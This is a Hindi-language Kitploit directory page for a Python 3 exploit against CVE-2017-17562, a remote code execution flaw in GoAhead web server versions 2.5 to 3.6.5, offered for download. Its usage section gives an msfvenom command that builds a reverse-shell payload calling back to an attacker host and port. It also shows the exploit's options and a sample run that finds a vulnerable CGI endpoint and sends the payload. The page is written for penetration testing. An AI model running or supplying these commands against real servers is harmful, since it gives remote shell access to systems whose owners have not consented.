Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-17562 — CVE-2017-17562 के लिए स्टैंडअलोन Python 3 एक्सप्लॉइट जो GoAhead वेब सर्वर 2.5–3.6.5 को लक्षित करता है, स्वचालित CGI एंडपॉइंट खोज और रिवर्स शेल पेलोड वितरण के साथ। | Kitploit
उपकरण/GitHubGitHub/ivanitlearning/cve-2017-17562
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubivanitlearning/cve-2017-17562

CVE-2017-17562

CVE-2017-17562 के लिए स्टैंडअलोन Python 3 एक्सप्लॉइट जो GoAhead वेब सर्वर 2.5–3.6.5 को लक्षित करता है, स्वचालित CGI एंडपॉइंट खोज और रिवर्स शेल पेलोड वितरण के साथ।

रिपॉजिटरी देखें
104136 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-17562 RCE GoAhead वेब सर्वर 2.5 < 3.6.5

CVE-2017-17562 के लिए स्टैंडअलोन Python 3 रिवर्स शेल एक्सप्लॉइट, GoAhead वेब सर्वर संस्करण 2.5 < 3.6.5 पर काम करता है।

ब्लॉग लेख यहाँ।

Python 3.7 पर लिखा और परीक्षण किया गया, POC और असुरक्षित वातावरण यहाँ पर आधारित। कुछ कोड Metasploit मॉड्यूल से लिया गया।

मूल POC यहाँ मिलेगा। मैंने यह इसलिए लिखा क्योंकि मैं मूल POC एक्सप्लॉइट को काम नहीं करवा पाया, और केवल तब एहसास हुआ कि उसमें शोषण के लिए CGI मॉड्यूल खोजने वाला फ़ंक्शन गायब था, अर्थात इसमें उपयोगकर्ता को उसका स्थान निर्दिष्ट करने या पुनरावर्ती खोज के लिए वर्डलिस्ट प्रदान करने की आवश्यकता होती है।

उपयोग

root@kitploit:~
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] [-cgipath CGIPATH] -payload
                  PAYLOAD

Generate the payload first, eg: 
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o dir/payload.so

Required arguments:
  -rhost RHOST      Target host running Go Ahead webserver eg. 192.168.92.153
  -payload PAYLOAD  Path to the malicious elf-so payload. eg dir/payload.so

Optional arguments:
  -rport RPORT      Target port running GoAhead webserver. Default: 8080
  -cgipath CGIPATH  The path to a CGI script on the GoAhead server Default: '/cgi-bin' as in http://192.168.92.153/cgi-bin

Call the exploit like this: 
./exploit.py -rhost 192.168.92.153 -rport 8080 -cgipath /cgi-bin/index -payload dir/payload.so
root@Kali:~/Infosec/RubyStuff/GoAhead-Web-Server-2.5~3.6.5# ./exploit.py -rhost 192.168.92.153 -rport 8080 -payload payload3.so 
Searching 390 paths for an exploitable CGI endpoint...
Exploitable CGI located at /cgi-bin/index
Sending payload...
टूल डाउनलोड करें